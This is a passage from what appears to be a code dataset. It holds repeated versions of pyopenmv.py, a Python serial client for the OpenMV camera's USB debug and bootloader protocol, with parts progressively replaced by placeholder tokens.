__serial.write(buf)\n\ndef set_attr(attr, value):\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack(\"<II\", attr, value))\n\ndef get_attr(attr):\n __serial.write(struct.pack(\"<BBIh\", __USBDBG_CMD, __USBDBG_ATTR_READ, 1, attr))\n return __serial.read(1)\n\ndef reset():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\ndef reset_to_bl():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_SYS_RESET_TO_BL, 0))\n\ndef bootloader_start():\n __serial.write(struct.pack(\"<I\", __BOOTLDR_START))\n return struct.unpack(\"I\", __serial.read(4))[0] == __BOOTLDR_START\n\ndef bootloader_reset():\n __serial.write(struct.pack(\"<I\", __BOOTLDR_RESET))\n\ndef flash_erase(sector):\n __serial.write(struct.pack(\"<II\", __BOOTLDR_ERASE, sector))\n\ndef flash_write(buf):\n __serial.write(struct.pack(\"<I\", __BOOTLDR_WRITE) + buf)\n\ndef tx_buf_len():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack(\"I\", __serial.read(4))[0]\n\ndef tx_buf(bytes):\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\ndef fw_version():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack(\"III\", __serial.read(12))\n\ndef enable_fb(enable):\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack(\"<I\", enable))\n\ndef arch_str():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\0', 1)[0]\n\nif __name__ == '__main__':\n if len(sys.argv)!= 3:\n print ('usage: pyopenmv.py <port> <script>')\n sys.exit(1)\n\n with open(sys.argv[2], 'r') as fin:\n buf = fin.read()\n\n disconnect()\n init(sys.argv[1])\n stop_script()\n exec_script(buf)\n tx_len = tx_buf_len()\n time.sleep(0.250)\n if (tx_len):\n print(tx_buf(tx_len).decode())\n disconnect()\n",
"import struct\nimport sys, time\nimport serial\nimport platform\nimport numpy as np\nfrom PIL import Image\n__serial = None\n__FB_HDR_SIZE = 12\n__USBDBG_CMD = 48\n__USBDBG_FW_VERSION = 128\n__USBDBG_FRAME_SIZE = 129\n__USBDBG_FRAME_DUMP = 130\n__USBDBG_ARCH_STR = 131\n__USBDBG_SCRIPT_EXEC = 5\n__USBDBG_SCRIPT_STOP = 6\n__USBDBG_SCRIPT_SAVE = 7\n__USBDBG_SCRIPT_RUNNING = 135\n__USBDBG_TEMPLATE_SAVE = 8\n__USBDBG_DESCRIPTOR_SAVE = 9\n__USBDBG_ATTR_READ = 138\n__USBDBG_ATTR_WRITE = 11\n__USBDBG_SYS_RESET = 12\n__USBDBG_SYS_RESET_TO_BL = 14\n__USBDBG_FB_ENABLE = 13\n__USBDBG_TX_BUF_LEN = 142\n__USBDBG_TX_BUF = 143\nATTR_CONTRAST = 0\nATTR_BRIGHTNESS = 1\nATTR_SATURATION = 2\nATTR_GAINCEILING = 3\n__BOOTLDR_START = 2882338817\n__BOOTLDR_RESET = 2882338818\n__BOOTLDR_ERASE = 2882338820\n__BOOTLDR_WRITE = 2882338824\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\ndef set_attr(attr, value):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack('<II', attr, value))\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n 
__USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\ndef flash_write(buf):\n __serial.write(struct.pack('<I', __BOOTLDR_WRITE) + buf)\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print('usage: pyopenmv.py <port> <script>')\n sys.exit(1)\n with open(sys.argv[2], 'r') as fin:\n buf = fin.read()\n disconnect()\n init(sys.argv[1])\n stop_script()\n exec_script(buf)\n tx_len = tx_buf_len()\n time.sleep(0.25)\n if tx_len:\n print(tx_buf(tx_len).decode())\n disconnect()\n",
"<import token>\n__serial = None\n__FB_HDR_SIZE = 12\n__USBDBG_CMD = 48\n__USBDBG_FW_VERSION = 128\n__USBDBG_FRAME_SIZE = 129\n__USBDBG_FRAME_DUMP = 130\n__USBDBG_ARCH_STR = 131\n__USBDBG_SCRIPT_EXEC = 5\n__USBDBG_SCRIPT_STOP = 6\n__USBDBG_SCRIPT_SAVE = 7\n__USBDBG_SCRIPT_RUNNING = 135\n__USBDBG_TEMPLATE_SAVE = 8\n__USBDBG_DESCRIPTOR_SAVE = 9\n__USBDBG_ATTR_READ = 138\n__USBDBG_ATTR_WRITE = 11\n__USBDBG_SYS_RESET = 12\n__USBDBG_SYS_RESET_TO_BL = 14\n__USBDBG_FB_ENABLE = 13\n__USBDBG_TX_BUF_LEN = 142\n__USBDBG_TX_BUF = 143\nATTR_CONTRAST = 0\nATTR_BRIGHTNESS = 1\nATTR_SATURATION = 2\nATTR_GAINCEILING = 3\n__BOOTLDR_START = 2882338817\n__BOOTLDR_RESET = 2882338818\n__BOOTLDR_ERASE = 2882338820\n__BOOTLDR_WRITE = 2882338824\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\ndef set_attr(attr, value):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack('<II', attr, value))\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', 
__BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\ndef flash_write(buf):\n __serial.write(struct.pack('<I', __BOOTLDR_WRITE) + buf)\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print('usage: pyopenmv.py <port> <script>')\n sys.exit(1)\n with open(sys.argv[2], 'r') as fin:\n buf = fin.read()\n disconnect()\n init(sys.argv[1])\n stop_script()\n exec_script(buf)\n tx_len = tx_buf_len()\n time.sleep(0.25)\n if tx_len:\n print(tx_buf(tx_len).decode())\n disconnect()\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\ndef set_attr(attr, value):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack('<II', attr, value))\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\ndef flash_write(buf):\n __serial.write(struct.pack('<I', __BOOTLDR_WRITE) + buf)\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, 
__USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print('usage: pyopenmv.py <port> <script>')\n sys.exit(1)\n with open(sys.argv[2], 'r') as fin:\n buf = fin.read()\n disconnect()\n init(sys.argv[1])\n stop_script()\n exec_script(buf)\n tx_len = tx_buf_len()\n time.sleep(0.25)\n if tx_len:\n print(tx_buf(tx_len).decode())\n disconnect()\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\ndef set_attr(attr, value):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack('<II', attr, value))\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\ndef flash_write(buf):\n __serial.write(struct.pack('<I', __BOOTLDR_WRITE) + buf)\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, 
__USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\ndef set_attr(attr, value):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack('<II', attr, value))\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', 
__serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 